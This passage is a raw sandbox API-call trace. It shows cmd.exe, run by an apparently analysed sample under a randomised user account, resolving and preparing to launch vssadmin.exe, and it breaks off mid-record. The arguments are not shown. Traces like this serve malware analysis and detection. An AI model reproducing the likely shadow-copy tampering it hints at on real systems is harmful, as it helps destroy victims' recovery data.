lpFilename=0x562020, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0062.823] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0062.823] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0062.823] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.823] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0062.823] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0062.823] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0062.823] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0062.823] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0062.823] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0062.823] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0062.823] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0062.823] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0062.823] GetProcessHeap () returned 0x550000 [0062.823] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x562af0 | out: hHeap=0x550000) returned 1 [0062.823] GetEnvironmentStringsW () returned 0x562230* [0062.823] GetProcessHeap () returned 0x550000 [0062.823] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xae2) returned 0x564b90 [0062.824] FreeEnvironmentStringsW (penv=0x562230) returned 1 [0062.824] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.824] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.824] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0062.824] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0062.824] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0062.824] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0062.824] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0062.824] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0062.824] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0062.824] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0062.824] GetProcessHeap () returned 0x550000 [0062.824] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x565680 [0062.824] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef910 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.824] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef910, lpFilePart=0x2ef90c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef90c*="Desktop") returned 0x25 [0062.824] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.825] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef68c | out: lpFindFileData=0x2ef68c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x561e98 [0062.825] FindClose (in: hFindFile=0x561e98 | out: hFindFile=0x561e98) returned 1 [0062.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef68c | out: lpFindFileData=0x2ef68c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x561e98 [0062.825] FindClose (in: hFindFile=0x561e98 | out: hFindFile=0x561e98) returned 1 [0062.825] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0062.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef68c | out: lpFindFileData=0x2ef68c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd010580, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0xd010580, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x561e98 [0062.825] FindClose (in: hFindFile=0x561e98 | out: hFindFile=0x561e98) returned 1 [0062.825] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.825] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0062.826] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0062.826] GetProcessHeap () returned 0x550000 [0062.826] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x564b90 | out: hHeap=0x550000) returned 1 [0062.826] GetEnvironmentStringsW () returned 0x5640a0* [0062.826] GetProcessHeap () returned 0x550000 [0062.826] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xb36) returned 0x565ee0 [0062.826] FreeEnvironmentStringsW (penv=0x5640a0) returned 1 [0062.826] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.826] GetProcessHeap () returned 0x550000 [0062.826] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x565680 | out: hHeap=0x550000) returned 1 [0062.826] GetProcessHeap () returned 0x550000 [0062.826] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400e) returned 0x566a20 [0062.827] GetProcessHeap () returned 0x550000 [0062.827] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x562d70 [0062.827] GetProcessHeap () returned 0x550000 [0062.827] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566a20 | out: hHeap=0x550000) returned 1 [0062.827] GetConsoleOutputCP () returned 0x1b5 [0062.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0062.827] GetUserDefaultLCID () returned 0x409 [0062.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0062.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efa50, cchData=128 | out: lpLCData="0") returned 2 [0062.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efa50, cchData=128 | out: lpLCData="0") returned 2 [0062.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efa50, cchData=128 | out: lpLCData="1") returned 2 [0062.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0062.828] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0062.829] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0062.829] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0062.829] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0062.829] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0062.829] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0062.829] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0062.829] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0062.829] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0062.829] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0062.831] GetProcessHeap () returned 0x550000 [0062.831] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20c) returned 0x562dd0 [0062.831] GetConsoleTitleW (in: lpConsoleTitle=0x562dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.831] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.831] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0062.831] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0062.831] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0062.832] GetProcessHeap () returned 0x550000 [0062.832] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x400a) returned 0x566a20 [0062.832] GetProcessHeap () returned 0x550000 [0062.832] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566a20 | out: hHeap=0x550000) returned 1 [0062.833] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0062.833] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0062.833] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0062.833] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0062.833] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0062.833] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0062.833] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0062.833] GetProcessHeap () returned 0x550000 [0062.833] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x562fe8 [0062.833] GetProcessHeap () returned 0x550000 [0062.833] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1a) returned 0x565720 [0062.834] GetProcessHeap () returned 0x550000 [0062.834] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x40) returned 0x563048 [0062.835] GetConsoleTitleW (in: lpConsoleTitle=0x2ef748, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0063.168] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0063.168] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0063.168] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0063.168] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0063.168] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0063.168] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0063.168] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0063.168] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0063.168] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0063.168] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0063.168] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0063.168] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0063.169] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0063.169] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0063.169] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0063.169] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0063.169] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0063.169] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0063.169] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0063.169] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0063.169] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0063.169] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0063.169] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0063.169] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0063.169] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0063.169] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0063.169] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0063.169] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0063.169] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0063.169] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0063.170] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0063.170] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0063.170] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0063.170] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0063.170] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0063.170] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0063.170] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0063.170] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0063.170] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0063.170] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0063.170] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0063.170] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0063.170] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0063.170] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0063.170] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0063.170] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0063.170] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0063.171] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0063.171] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0063.171] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0063.171] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0063.171] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0063.171] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0063.171] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0063.171] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0063.171] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0063.171] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0063.171] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0063.171] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0063.171] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0063.171] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0063.171] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0063.171] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0063.171] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0063.171] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0063.171] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0063.172] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0063.172] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0063.172] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0063.172] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0063.172] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0063.172] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0063.172] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0063.172] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0063.172] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0063.172] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0063.172] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0063.172] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0063.172] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0063.172] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0063.172] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0063.172] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0063.172] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0063.172] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0063.172] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0063.172] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0063.173] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0063.174] GetProcessHeap () returned 0x550000 [0063.174] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x210) returned 0x563090 [0063.174] GetProcessHeap () returned 0x550000 [0063.174] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x52) returned 0x5632a8 [0063.174] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0063.174] GetProcessHeap () returned 0x550000 [0063.174] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x418) returned 0x5507f0 [0063.174] SetErrorMode (uMode=0x0) returned 0x0 [0063.175] SetErrorMode (uMode=0x1) returned 0x0 [0063.175] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5507f8, lpFilePart=0x2ef268 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef268*="Desktop") returned 0x25 [0063.175] SetErrorMode (uMode=0x0) returned 0x1 [0063.175] GetProcessHeap () returned 0x550000 [0063.175] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5507f0, Size=0x66) returned 0x5507f0 [0063.175] GetProcessHeap () returned 0x550000 [0063.175] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x5507f0) returned 0x66 [0063.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0063.175] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0063.175] GetProcessHeap () returned 0x550000 [0063.175] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x120) returned 0x563308 [0063.175] GetProcessHeap () returned 0x550000 [0063.175] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x238) returned 0x550860 [0063.188] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x550860, Size=0x122) returned 0x550860 [0063.188] GetProcessHeap () returned 0x550000 [0063.188] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x550860) returned 0x122 [0063.188] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0063.188] GetProcessHeap () returned 0x550000 [0063.188] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe0) returned 0x563430 [0063.189] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x563430, Size=0x76) returned 0x563430 [0063.189] GetProcessHeap () returned 0x550000 [0063.189] RtlSizeHeap (HeapHandle=0x550000, Flags=0x0, MemoryPointer=0x563430) returned 0x76 [0063.591] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.591] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eefe4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eefe4) returned 0xffffffff [0063.592] GetLastError () returned 0x2 [0063.592] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x2eefe4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eefe4) returned 0xffffffff [0063.592] GetLastError () returned 0x2 [0063.592] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.592] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eefe4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eefe4) returned 0x5634b0 [0063.592] GetProcessHeap () returned 0x550000 [0063.592] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x14) returned 0x5634f0 [0063.592] FindClose (in: hFindFile=0x5634b0 | out: hFindFile=0x5634b0) returned 1 [0063.592] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x2eefe4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eefe4) returned 0xffffffff [0063.593] GetLastError () returned 0x2 [0063.593] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eefe4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eefe4) returned 0x5634b0 [0063.593] GetProcessHeap () returned 0x550000 [0063.593] RtlReAllocateHeap (Heap=0x550000, Flags=0x0, Ptr=0x5634f0, Size=0x4) returned 0x5634f0 [0063.593] FindClose (in: hFindFile=0x5634b0 | out: hFindFile=0x5634b0) returned 1 [0063.593] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0063.593] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0063.593] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0063.593] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef364, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef42c | out: lpAttributeList=0x2ef364, lpSize=0x2ef42c) returned 1 [0063.594] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef364, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef424, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef364, lpPreviousValue=0x0) returned 1 [0063.594] GetStartupInfoW (in: lpStartupInfo=0x2ef320 | out: lpStartupInfo=0x2ef320*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0063.594] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x18) returned 0x5634b0 [0063.594] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0063.594] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0063.594] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0063.594] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0063.594] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0063.594] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0063.594] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0063.594] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0063.595] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0063.596] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0063.596] GetProcessHeap 